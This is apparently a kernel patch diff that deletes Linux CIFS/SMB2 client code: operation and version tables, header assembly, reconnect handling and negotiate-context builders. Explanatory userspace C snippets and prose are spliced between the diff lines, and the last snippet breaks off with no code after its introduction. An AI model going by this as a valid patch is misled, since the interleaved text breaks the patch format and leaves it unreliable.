+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb311_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.generate_signingkey = generate_smb311signingkey,
+-	.calc_signature = smb3_calc_signature,
+-	.set_integrity  = smb3_set_integrity,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb3_set_oplock_level,
+-	.create_lease_buf = smb3_create_lease_buf,
+-	.parse_lease_buf = smb3_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.duplicate_extents = smb2_duplicate_extents,
+-/*	.validate_negotiate = smb3_validate_negotiate, */ /* not used in 3.11 */
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.fallocate = smb3_fallocate,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.init_transform_rq = smb3_init_transform_rq,
+-	.is_transform_hdr = smb3_is_transform_hdr,
+-	.receive_transform = smb3_receive_transform,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct smb_version_values smb20_values = {
+-	.version_string = SMB20_VERSION_STRING,
+-	.protocol_id = SMB20_PROT_ID,
+-	.req_capabilities = 0, /* MBZ */
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease),
+-};
+-#endif /* ALLOW_INSECURE_LEGACY */
+-
+-struct smb_version_values smb21_values = {
+-	.version_string = SMB21_VERSION_STRING,
+-	.protocol_id = SMB21_PROT_ID,
+-	.req_capabilities = 0, /* MBZ on negotiate req until SMB3 dialect */
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease),
+-};
+-
+-struct smb_version_values smb3any_values = {
+-	.version_string = SMB3ANY_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smbdefault_values = {
+-	.version_string = SMBDEFAULT_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb30_values = {
+-	.version_string = SMB30_VERSION_STRING,
+-	.protocol_id = SMB30_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb302_values = {
+-	.version_string = SMB302_VERSION_STRING,
+-	.protocol_id = SMB302_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+-
+-struct smb_version_values smb311_values = {
+-	.version_string = SMB311_VERSION_STRING,
+-	.protocol_id = SMB311_PROT_ID,
+-	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.header_preamble_size = 0,
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
+-	.create_lease_size = sizeof(struct create_lease_v2),
+-};
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+deleted file mode 100644
+index 537e8679900b8..0000000000000
+--- a/fs/cifs/smb2pdu.c
++++ /dev/null
+@@ -1,5722 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2009, 2013
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- *   Contains the routines for constructing the SMB2 PDUs themselves
+- *
+- */
+-
+- /* SMB2 PDU handling routines here - except for leftovers (e.g. session setup) */
+- /* Note that there are handle based routines which must be		      */
+- /* treated slightly differently for reconnection purposes since we never     */
+- /* want to reuse a stale file handle and only the caller knows the file info */
+-
+-#include <linux/fs.h>
+-#include <linux/kernel.h>
+-#include <linux/vfs.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/uaccess.h>
+-#include <linux/uuid.h>
+-#include <linux/pagemap.h>
+-#include <linux/xattr.h>
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "ntlmssp.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "cifspdu.h"
+-#include "cifs_spnego.h"
+-#include "smbdirect.h"
+-#include "trace.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#include "cached_dir.h"
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 requests
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order.
+- */
+-static const int smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ 36,
+-	/* SMB2_SESSION_SETUP */ 25,
+-	/* SMB2_LOGOFF */ 4,
+-	/* SMB2_TREE_CONNECT */	9,
+-	/* SMB2_TREE_DISCONNECT */ 4,
+-	/* SMB2_CREATE */ 57,
+-	/* SMB2_CLOSE */ 24,
+-	/* SMB2_FLUSH */ 24,
+-	/* SMB2_READ */	49,
+-	/* SMB2_WRITE */ 49,
+-	/* SMB2_LOCK */	48,
+-	/* SMB2_IOCTL */ 57,
+-	/* SMB2_CANCEL */ 4,
+-	/* SMB2_ECHO */ 4,
+-	/* SMB2_QUERY_DIRECTORY */ 33,
+-	/* SMB2_CHANGE_NOTIFY */ 32,
+-	/* SMB2_QUERY_INFO */ 41,
+-	/* SMB2_SET_INFO */ 33,
+-	/* SMB2_OPLOCK_BREAK */ 24 /* BB this is 36 for LEASE_BREAK variant */
+-};
+-
+-int smb3_encryption_required(const struct cifs_tcon *tcon)
+-{
+-	if (!tcon || !tcon->ses)
+-		return 0;
+-	if ((tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
+-	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
+-		return 1;
+-	if (tcon->seal &&
+-	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		return 1;
+-	return 0;
+-}
+-
+-static void
+-smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
+-		  const struct cifs_tcon *tcon,
+-		  struct TCP_Server_Info *server)
+-{
+-	shdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	shdr->StructureSize = cpu_to_le16(64);
+-	shdr->Command = smb2_cmd;
+-	if (server) {
+-		spin_lock(&server->req_lock);
+-		/* Request up to 10 credits but don't go over the limit. */
+-		if (server->credits >= server->max_credits)
+-			shdr->CreditRequest = cpu_to_le16(0);
+-		else
+-			shdr->CreditRequest = cpu_to_le16(
+-				min_t(int, server->max_credits -
+-						server->credits, 10));
+-		spin_unlock(&server->req_lock);
+-	} else {
+-		shdr->CreditRequest = cpu_to_le16(2);
+-	}
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32((__u16)current->tgid);
+-
+-	if (!tcon)
+-		goto out;
+-
+-	/* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */
+-	/* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */
+-	if (server && (server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
+-		shdr->CreditCharge = cpu_to_le16(1);
+-	/* else CreditCharge MBZ */
+-
+-	shdr->Id.SyncId.TreeId = cpu_to_le32(tcon->tid);
+-	/* Uid is not converted */
+-	if (tcon->ses)
+-		shdr->SessionId = cpu_to_le64(tcon->ses->Suid);
+-
+-	/*
+-	 * If we would set SMB2_FLAGS_DFS_OPERATIONS on open we also would have
+-	 * to pass the path on the Open SMB prefixed by \\server\share.
+-	 * Not sure when we would need to do the augmented path (if ever) and
+-	 * setting this flag breaks the SMB2 open operation since it is
+-	 * illegal to send an empty path name (without \\server\share prefix)
+-	 * when the DFS flag is set in the SMB open header. We could
+-	 * consider setting the flag on all operations other than open
+-	 * but it is safer to not set it for now.
+-	 */
+-/*	if (tcon->share_flags & SHI1005_FLAGS_DFS)
+-		shdr->Flags |= SMB2_FLAGS_DFS_OPERATIONS; */
+-
+-	if (server && server->sign && !smb3_encryption_required(tcon))
+-		shdr->Flags |= SMB2_FLAGS_SIGNED;
+-out:
+-	return;
+-}
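
The CreditRequest clamp above is easier to see with concrete numbers. A minimal standalone sketch of the same arithmetic (userspace C with hypothetical credit values, not the locked kernel path):

#include <stdio.h>

/* Ask for up to 10 credits, but never more than the headroom left
 * between what the server has granted and its maximum. */
static unsigned short credit_request(int credits, int max_credits)
{
	int gap = max_credits - credits;

	if (gap <= 0)
		return 0;
	return (unsigned short)(gap < 10 ? gap : 10);
}

int main(void)
{
	printf("%u\n", credit_request(500, 512)); /* 10 */
	printf("%u\n", credit_request(509, 512)); /* 3  */
	printf("%u\n", credit_request(512, 512)); /* 0  */
	return 0;
}
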
+-
+-static int
+-smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	struct nls_table *nls_codepage = NULL;
+-	struct cifs_ses *ses;
+-
+-	/*
+-	 * SMB2's NegProt, SessSetup and Logoff do not have a tcon yet, so
+-	 * the tcp and smb session status checks for those three are done
+-	 * differently - in the calling routine.
+-	 */
+-	if (tcon == NULL)
+-		return 0;
+-
+-	/*
+-	 * Need to also skip SMB2_IOCTL because it is used for checking nested dfs links in
+-	 * cifs_tree_connect().
+-	 */
+-	if (smb2_command == SMB2_TREE_CONNECT || smb2_command == SMB2_IOCTL)
+-		return 0;
+-
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_EXITING) {
+-		/*
+-		 * only tree disconnect allowed when disconnecting ...
+-		 */
+-		if (smb2_command != SMB2_TREE_DISCONNECT) {
+-			spin_unlock(&tcon->tc_lock);
+-			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+-				 smb2_command);
+-			return -ENODEV;
+-		}
+-	}
+-	spin_unlock(&tcon->tc_lock);
+-
+-	ses = tcon->ses;
+-	if (!ses)
+-		return -EIO;
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_EXITING) {
+-		spin_unlock(&ses->ses_lock);
+-		return -EIO;
+-	}
+-	spin_unlock(&ses->ses_lock);
+-	if (!ses->server || !server)
+-		return -EIO;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			spin_unlock(&server->srv_lock);
+-			return -EAGAIN;
+-		}
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-again:
+-	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	cifs_dbg(FYI, "sess reconnect mask: 0x%lx, tcon reconnect: %d",
+-		 tcon->ses->chans_need_reconnect,
+-		 tcon->need_reconnect);
+-
+-	mutex_lock(&ses->session_mutex);
+-	/*
+-	 * Recheck after acquiring the mutex. If another thread is negotiating
+-	 * and the server never sends an answer, the socket will be closed
+-	 * and tcpStatus set to reconnect.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		mutex_unlock(&ses->session_mutex);
+-
+-		if (tcon->retry)
+-			goto again;
+-
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	nls_codepage = load_nls_default();
+-
+-	/*
+-	 * need to prevent multiple threads trying to simultaneously
+-	 * reconnect the same SMB session
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) &&
+-	    ses->ses_status == SES_GOOD) {
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-		/* this means that we only need to tree connect */
+-		if (tcon->need_reconnect)
+-			goto skip_sess_setup;
+-
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	rc = cifs_negotiate_protocol(0, ses, server);
+-	if (!rc) {
+-		rc = cifs_setup_session(0, ses, server, nls_codepage);
+-		if ((rc == -EACCES) && !tcon->retry) {
+-			mutex_unlock(&ses->session_mutex);
+-			rc = -EHOSTDOWN;
+-			goto failed;
+-		} else if (rc) {
+-			mutex_unlock(&ses->session_mutex);
+-			goto out;
+-		}
+-	} else {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-skip_sess_setup:
+-	if (!tcon->need_reconnect) {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-	cifs_mark_open_files_invalid(tcon);
+-	if (tcon->use_persistent)
+-		tcon->need_reopen_files = true;
+-
+-	rc = cifs_tree_connect(0, tcon, nls_codepage);
+-	mutex_unlock(&ses->session_mutex);
+-
+-	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+-	if (rc) {
+-		/* If sess reconnected but tcon didn't, something strange ... */
+-		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+-		goto out;
+-	}
+-
+-	if (smb2_command != SMB2_INTERNAL_CMD)
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-
+-	atomic_inc(&tconInfoReconnectCount);
+-out:
+-	/*
+-	 * Check if handle based operation so we know whether we can continue
+-	 * or not without returning to caller to reset file handle.
+-	 */
+-	/*
+-	 * BB Is flush done by server on drop of tcp session? Should we special
+-	 * case it and skip above?
+-	 */
+-	switch (smb2_command) {
+-	case SMB2_FLUSH:
+-	case SMB2_READ:
+-	case SMB2_WRITE:
+-	case SMB2_LOCK:
+-	case SMB2_IOCTL:
+-	case SMB2_QUERY_DIRECTORY:
+-	case SMB2_CHANGE_NOTIFY:
+-	case SMB2_QUERY_INFO:
+-	case SMB2_SET_INFO:
+-		rc = -EAGAIN;
+-	}
+-failed:
+-	unload_nls(nls_codepage);
+-	return rc;
+-}
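
The switch at the end of smb2_reconnect() converts handle-based commands to -EAGAIN so the caller reopens the stale file handle. A rough standalone classification of that same command set (opcodes ordered as in MS-SMB2; the helper name is made up):

#include <stdio.h>

enum smb2_cmd {
	SMB2_NEGOTIATE, SMB2_SESSION_SETUP, SMB2_LOGOFF, SMB2_TREE_CONNECT,
	SMB2_TREE_DISCONNECT, SMB2_CREATE, SMB2_CLOSE, SMB2_FLUSH,
	SMB2_READ, SMB2_WRITE, SMB2_LOCK, SMB2_IOCTL, SMB2_CANCEL,
	SMB2_ECHO, SMB2_QUERY_DIRECTORY, SMB2_CHANGE_NOTIFY,
	SMB2_QUERY_INFO, SMB2_SET_INFO, SMB2_OPLOCK_BREAK
};

/* Handle-based requests cannot be retried transparently after a
 * reconnect; only the caller can reset the file handle. */
static int needs_handle_reset(enum smb2_cmd cmd)
{
	switch (cmd) {
	case SMB2_FLUSH: case SMB2_READ: case SMB2_WRITE: case SMB2_LOCK:
	case SMB2_IOCTL: case SMB2_QUERY_DIRECTORY: case SMB2_CHANGE_NOTIFY:
	case SMB2_QUERY_INFO: case SMB2_SET_INFO:
		return 1;
	default:
		return 0;
	}
}

int main(void)
{
	printf("READ needs reopen: %d\n", needs_handle_reset(SMB2_READ));
	printf("ECHO needs reopen: %d\n", needs_handle_reset(SMB2_ECHO));
	return 0;
}
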
+-
+-static void
+-fill_small_buf(__le16 smb2_command, struct cifs_tcon *tcon,
+-	       struct TCP_Server_Info *server,
+-	       void *buf,
+-	       unsigned int *total_len)
+-{
+-	struct smb2_pdu *spdu = buf;
+-	/* lookup word count ie StructureSize from table */
+-	__u16 parmsize = smb2_req_struct_sizes[le16_to_cpu(smb2_command)];
+-
+-	/*
+-	 * smaller than SMALL_BUFFER_SIZE but bigger than fixed area of
+-	 * largest operations (Create)
+-	 */
+-	memset(buf, 0, 256);
+-
+-	smb2_hdr_assemble(&spdu->hdr, smb2_command, tcon, server);
+-	spdu->StructureSize2 = cpu_to_le16(parmsize);
+-
+-	*total_len = parmsize + sizeof(struct smb2_hdr);
+-}
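
fill_small_buf() derives the fixed request length as the command's StructureSize plus the 64-byte SMB2 header. A toy check with two entries from the table above:

#include <stdio.h>

#define SMB2_HDR_SIZE 64

int main(void)
{
	int create_structsize = 57; /* SMB2_CREATE, from the table */
	int read_structsize = 49;   /* SMB2_READ */

	printf("CREATE fixed length: %d\n", create_structsize + SMB2_HDR_SIZE); /* 121 */
	printf("READ fixed length:   %d\n", read_structsize + SMB2_HDR_SIZE);   /* 113 */
	return 0;
}
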
+-
+-/*
+- * Allocate and return pointer to an SMB request hdr, and set basic
+- * SMB information in the SMB header. If the return code is zero, this
+- * function must have filled in request_buf pointer.
+- */
+-static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+-				 struct TCP_Server_Info *server,
+-				 void **request_buf, unsigned int *total_len)
+-{
+-	/* BB eventually switch this to SMB2 specific small buf size */
+-	if (smb2_command == SMB2_SET_INFO)
+-		*request_buf = cifs_buf_get();
+-	else
+-		*request_buf = cifs_small_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-
+-	fill_small_buf(smb2_command, tcon, server,
+-		       (struct smb2_hdr *)(*request_buf),
+-		       total_len);
+-
+-	if (tcon != NULL) {
+-		uint16_t com_code = le16_to_cpu(smb2_command);
+-		cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_sent[com_code]);
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-	}
+-
+-	return 0;
+-}
+-
+-static int smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+-			       struct TCP_Server_Info *server,
+-			       void **request_buf, unsigned int *total_len)
+-{
+-	int rc;
+-
+-	rc = smb2_reconnect(smb2_command, tcon, server);
+-	if (rc)
+-		return rc;
+-
+-	return __smb2_plain_req_init(smb2_command, tcon, server, request_buf,
+-				     total_len);
+-}
+-
+-static int smb2_ioctl_req_init(u32 opcode, struct cifs_tcon *tcon,
+-			       struct TCP_Server_Info *server,
+-			       void **request_buf, unsigned int *total_len)
+-{
+-	/* Skip reconnect only for FSCTL_VALIDATE_NEGOTIATE_INFO IOCTLs */
+-	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO) {
+-		return __smb2_plain_req_init(SMB2_IOCTL, tcon, server,
+-					     request_buf, total_len);
+-	}
+-	return smb2_plain_req_init(SMB2_IOCTL, tcon, server,
+-				   request_buf, total_len);
+-}
+-
+-/* For explanation of negotiate contexts see MS-SMB2 section 2.2.3.1 */
+-
+-static void
+-build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
+-	pneg_ctxt->DataLength = cpu_to_le16(38);
+-	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
+-	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
+-	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
+-	pneg_ctxt->HashAlgorithms = SMB2_PREAUTH_INTEGRITY_SHA512;
+-}
+-
+-static void
+-build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
+-	pneg_ctxt->DataLength =
+-		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
+-			  - sizeof(struct smb2_neg_context));
+-	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(3);
+-	pneg_ctxt->CompressionAlgorithms[0] = SMB3_COMPRESS_LZ77;
+-	pneg_ctxt->CompressionAlgorithms[1] = SMB3_COMPRESS_LZ77_HUFF;
+-	pneg_ctxt->CompressionAlgorithms[2] = SMB3_COMPRESS_LZNT1;
+-}
+-
+-static unsigned int
+-build_signing_ctxt(struct smb2_signing_capabilities *pneg_ctxt)
+-{
+-	unsigned int ctxt_len = sizeof(struct smb2_signing_capabilities);
+-	unsigned short num_algs = 1; /* number of signing algorithms sent */
+-
+-	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
+-	/*
+-	 * Context Data length must be rounded to a multiple of 8 for some servers
+-	 */
+-	pneg_ctxt->DataLength = cpu_to_le16(ALIGN(sizeof(struct smb2_signing_capabilities) -
+-					    sizeof(struct smb2_neg_context) +
+-					    (num_algs * sizeof(u16)), 8));
+-	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(num_algs);
+-	pneg_ctxt->SigningAlgorithms[0] = cpu_to_le16(SIGNING_ALG_AES_CMAC);
+-
+-	ctxt_len += sizeof(__le16) * num_algs;
+-	ctxt_len = ALIGN(ctxt_len, 8);
+-	return ctxt_len;
+-	/* TBD add SIGNING_ALG_AES_GMAC and/or SIGNING_ALG_HMAC_SHA256 */
+-}
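
The 8-byte rounding above uses the kernel ALIGN() macro. A standalone equivalent; the 12-byte raw length below is an assumed breakdown (8-byte context header, 2-byte algorithm count, one 2-byte algorithm ID), not the exact struct sizes:

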